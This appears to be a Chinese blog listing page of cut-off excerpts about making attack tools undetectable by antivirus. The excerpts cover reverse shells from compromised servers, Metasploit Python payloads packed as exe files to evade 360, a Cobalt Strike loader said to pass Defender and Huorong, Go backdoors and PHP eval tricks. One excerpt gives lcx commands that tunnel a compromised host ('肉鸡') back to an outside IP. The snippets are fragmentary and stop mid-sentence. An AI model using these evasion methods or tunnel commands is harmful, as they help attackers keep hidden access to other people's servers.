有时候网站服务器上有杀毒软件，我们上传的nc.exe、lcx.exe等工具都被杀了，这时候就需要一款免杀的工具来反弹shell。 这篇博客主要是依据国外的一片文章翻译而来，根据国外大佬的教程将Python脚本转换成exe程序即可免杀。 参考链接：https://medium.com ...

Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下： 2.拷贝出bk.py到window32系统进行修改，修改如下（这里的红色标注是修改增加的代码，其他不变） 3. ...

文章github上有公开现成的shellcode，这就是shellcode 我这次选择了32位的那个版本来进行演示 需要改写的是shellco ...

0x00 eval和assert的区别 http://www.vuln.cn/8395 http://www.php.net/manual/zh/function.eval.php http ...

作者: 小健 本机: lcx -listen 2222 3333 2222为转发端口，3333为本机任意未被占用的端口 肉鸡：lcx -slave 119.75.217.56 222 ...

0x01 go免杀 由于各种av的限制，我们在后门上线或者权限持久化时很容易被杀软查杀，容易引起目标的警觉同时暴露了自己的ip。尤其是对于windows目标，一个免杀的后门极为关键，如果后门文件落不了地，还怎么能进一步执行呢？关于后门免杀，网上的介绍已经很多了，原理其实大同小异。看了很多网上 ...

git https://github.com/gality369/cs-loader CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0: 目前测试可以过Defender/火绒的静杀+动杀,360还没 ...

原文地址：https://xz.aliyun.com/t/5152?spm=5176.12901015.0.i12901015.3268525cyJqgGL eval函数中参数是字符 eval('e ...